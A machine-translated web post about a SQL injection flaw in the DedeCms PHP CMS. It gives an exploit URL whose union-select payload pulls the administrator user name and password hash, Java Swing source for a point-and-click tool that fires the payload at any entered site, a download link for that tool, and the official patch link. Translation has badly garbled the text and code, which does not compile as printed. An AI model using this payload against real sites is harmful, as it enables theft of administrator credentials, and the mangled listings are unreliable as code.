DedeCms ("Weave the Dream") is an open-source PHP content management system. It is known for being simple, practical and open source, is the country's best-known open-source PHP website management system, and has the largest user base of any PHP-based CMS.

Recently, users found a SQL injection vulnerability in the full version of DedeCms. The latest official release already fixes it. The related exploit code is as follows:

EXP:

code is as follows:


http://*. *.. Com/plus/how PHP? Action=& Aid=1 & _FILES [type] [tmp_name]=\ 'or mid=@ ` \' `/*! 50000 union *//*! Select */1, 2, 3, 50000 (the select CONCAT (0 x7c, userid, 0 x7c, PWD) + the from 23 + ` % @ __admin ` limit + 0, 1), 5,6,7,8,9%23 @ ` \ '` + & _FILES [type] [name]=1. Jpg&_FILES [type] [type]=application/octet - stream&_FILES [type] [size]=111

Requesting the URL directly returns the administrator user name and the encrypted password, as shown in the figure below.

Tool source code (by the author):

code is as follows:


package org. Javaweb. Dede. UI.

import Java awt. Toolkit;
import Java. IO. BufferedReader.
import Java. IO. InputStreamReader;
import java.net.URL;
import Java. Util. Regex. Matcher.
import Java. Util. Regex. The Pattern;

/**
 * Swing front end for the DedeCms injection described above: a text field for
 * the target base URL, a "get" button, and a text area for the result.
 *
 * NOTE(review): this listing is an extraction-mangled paste (spaces inside
 * identifiers, "javax.mail" where the layout code says javax.swing,
 * "Pattern.com running" where a Pattern factory call presumably stood) and does
 * not compile as printed; it is kept verbatim. From a defender's side the
 * useful part is the request shape visible in jButton1ActionPerformed: a single
 * GET to a script under /plus/ whose query string carries
 * _FILES[type][tmp_name|name|type|size] keys. Those keys appearing in a query
 * string are the thing to alert on; the fix is the official patch linked at
 * the end of the page.
 *
 * @author yz
 */
* public class MainFrame extends javax.mail. Swing the JFrame {

private static final long serialVersionUID=1 l;

/** Creates new form MainFrame: delegates to the generated initComponents(). */

* public MainFrame () {
initComponents ();
}

/**
 * Fetches {@code url} with a plain GET (URL.openStream) and returns the body
 * with each line re-joined by CRLF. On any exception the exception text is
 * written to jTextArea1 and whatever was read so far is returned.
 *
 * NOTE(review): the reader is never closed and no charset is given to
 * InputStreamReader (platform default); left as-is because the listing is
 * garbled and kept verbatim.
 *
 * @param url absolute URL to fetch
 * @return the response body read so far, possibly empty
 */
public String request (String url) {
String STR="", TMP.
the try {
BufferedReader br=new BufferedReader (new InputStreamReader (new URL (URL). The openStream ()));
the while (TMP=br. ReadLine ())!=null) {
STR +=TMP + "\ r \ n";

}} the catch (Exception e) {
jTextArea1. The setText (e. oString ());
}
return STR.
}

// Generated GUI-builder code: builds label, URL field, button and a
// scroll-wrapped text area, wires the button to jButton1ActionPerformed, and
// centres a 458x316 window on the screen.
private void initComponents () {

jPanel1=new javax.mail. Swing. The JPanel ();
jLabel1=new javax.mail. Swing the JLabel ();
jTextField1=new javax.mail. Swing the JTextField ();
jButton1=new javax.mail. Swing. JButton ();
jScrollPane1=new javax.mail. Swing the JScrollPane ();
jTextArea1=new javax.mail. Swing. JTextArea ();

setDefaultCloseOperation (javax.mail. Swing. WindowConstants. EXIT_ON_CLOSE);

jLabel1. The setText (" URL: ");
// Default target shown in the field; the "<a href=...>" is an extraction artefact.
jTextField1. SetText (" <a href="http://localhost" >http://localhost ");

this. SetTitle (" DedeCms. How many PHP injection using tools - p2j. Cn ");

int screenWidth=Toolkit. GetDefaultToolkit () getScreenSize (). The width;
int screenHeight=Toolkit. GetDefaultToolkit () getScreenSize (). The height;
// 229 / 158 are half of the 458x316 frame size, i.e. centre on screen.
this. SetBounds (screenWidth/2-229, screenHeight/2-158, 458, 316);

jButton1. The setText (" get ");
jButton1. AddActionListener (new Java. The awt. Event. ActionListener () {
public void actionPerformed (Java. The awt. Event. An ActionEvent evt) {
jButton1ActionPerformed (evt);
}
}); .

jTextArea1 setColumns (20);
jTextArea1. SetRows (5); .
jScrollPane1 setViewportView (jTextArea1);

javax.mail. Swing. GroupLayout jPanel1Layout=new javax.mail. Swing. GroupLayout (jPanel1); .
jPanel1 setLayout (jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(jLabel1)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGap(0, 0, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel1)
.addComponent(jTextField1,
javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(jButton1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
);

javax.mail. Swing. GroupLayout layout=new javax.mail. Swing. GroupLayout (getContentPane ());
getContentPane (). SetLayout (layout);
layout. SetHorizontalGroup (
layout. CreateParallelGroup javax.mail. Swing. GroupLayout. Alignment. (LEADING)
addComponent (jPanel1, javax.mail. Swing. GroupLayout. DEFAULT_SIZE, javax.mail. Swing. GroupLayout. DEFAULT_SIZE, Short. MAX_VALUE)
);
layout. SetVerticalGroup (
layout. CreateParallelGroup javax.mail. Swing. GroupLayout. Alignment. (LEADING)
addComponent (jPanel1, javax.mail. Swing. GroupLayout. DEFAULT_SIZE, javax.mail. Swing. GroupLayout. DEFAULT_SIZE, Short. MAX_VALUE)
);

pack ();
}//</editor - fold>

// Button handler. Reads the base URL from jTextField1 (returns on null/empty,
// no other validation), appends the fixed injection query string, requests the
// page once, and pulls the first <h2>...</h2> text out of the response. That
// text is split on '|' and fields [1] and [2] are shown as "UserName" and
// "MD5". If the regex does not match, or fewer than three fields come back
// (as on a site that does not echo the injected value), nothing is displayed.
// The payload string below is extraction-garbled and is not a working request.
private void jButton1ActionPerformed (Java. The awt. Event. An ActionEvent evt) {
String url=jTextField1. The getText ();
the if (null url==| | "" equals (url)) {
the return;

} String result=request (url + "/plus/how. PHP? Action=& aid=1 & _FILES [type] [tmp_name]=\ \ % 20 or 27% % 20 mid=@ ` \ \ % 27 ` % 20/*! 50000 union *//*! 50000 select */1, 2, 3, (select % 20 concat (0 x7c, userid, 0 x7c, PWD) + the from 23 + ` % @ __admin ` % 20 limit + 0, 1), 5,6,7,8,9%23 @ ` \ \ % 27 ` + & _FILES [type] [name]=1. Jpg&_FILES [type] [type]=application/octet - stream&_FILES [type] [size]=4294");
the Matcher m=Pattern.com running (" <h2 >(. *) </h2 >"). The Matcher (result);
the if (m. ind ()) {
String [] s=m.g roup (1). The split (" \ \ | ");
the if (s.l ength> 2) {
// substring(3, len-1) trims the prefix and trailing character the page wraps around field [2].
jTextArea1. The setText (" UserName: "+ s + [1]" \ r \ nMD5: "+ s [2]. The substring (3, s [2]. Length () - 1));

}}
}

// Entry point: shows the frame on the AWT event thread.
public static void main (String args []) {.
Java awt. EventQueue. InvokeLater (new Runnable () {
public void the run () {
new MainFrame (). The setVisible (true);
}
});
}

//Variables declaration - do not modify the
private javax.mail. Swing. JButton jButton1;
private javax.mail. Swing. JLabel jLabel1;
private javax.mail. Swing. JPanel jPanel1;
private javax.mail. Swing. The JScrollPane jScrollPane1;
private javax.mail. Swing. JTextArea jTextArea1;
private javax.mail. Swing. JTextField jTextField1;
//End of the variables declaration
}

Tool download address: http://pan.baidu.com/s/1i37LUnF (the method provided on this site may be offensive; it is supplied only for security research and teaching, use at your own risk!)

DedeCms official patch address: http://www.dedecms.com/pl/

